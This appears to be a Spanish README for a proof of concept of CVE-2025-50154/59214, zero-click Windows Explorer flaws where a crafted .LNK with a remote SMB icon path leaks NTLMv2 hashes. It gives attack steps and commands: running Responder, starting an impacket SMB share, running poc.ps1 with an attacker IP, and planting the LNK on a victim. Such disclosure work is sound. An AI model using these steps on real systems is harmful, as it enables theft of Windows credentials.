
POCs para CVE-2025-50154 y CVE-2025-59214, vulnerabilidades de día cero en el Explorador de archivos de Windows que divulgan NTLMv2-SSP sin interacción del usuario. Es un bypass del Parche de seguridad CVE-2025-24054.
Por Ruben Enkaoua y Cymulate
Primer blog: Zero Click, One NTLM: Bypass del parche de seguridad de Microsoft (CVE-2025-50154)
Segundo blog: Parcheado dos veces, aún se puede omitir: Nueva fuga de NTLM (Bypass del parche CVE-2025-50154)
La vulnerabilidad original, parcheada recientemente, era una divulgación de hash NTLM de 0 clics activada cuando explorer.exe representaba el icono de un archivo de acceso directo .LNK cuyo icono estaba alojado en un servidor SMB remoto.
Después del parche, explorer.exe ya no carga iconos desde rutas SMB remotas, lo que impide la divulgación automática de hashes NTLM.
Actualización: El parche para CVE-2025-50154 no funcionó en absoluto. Lo reportamos y se asignó un nuevo CVE a la vulnerabilidad: CVE-2025-59214. El POC es relevante para ambos CVE.
Al crear un archivo .LNK con:
Inicia un servidor Responder en tu servidor Crea un LNK malicioso con PowerShell, en una máquina diferente, y luego colócalo en la víctima (descarga maliciosa, subida SMB...) El proceso explorer.exe representará el icono descargando el archivo automáticamente, buscando los encabezados RT_ICON y RT_GROUP_ICON en la sección .rsrc Este código es solo para fines educativos y de investigación. El autor no se hace responsable del mal uso de este código.El proceso explorer.exe aún obtendrá el archivo remoto para extraer el icono PE de sus recursos RT_GROUP_ICON y RT_ICON.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"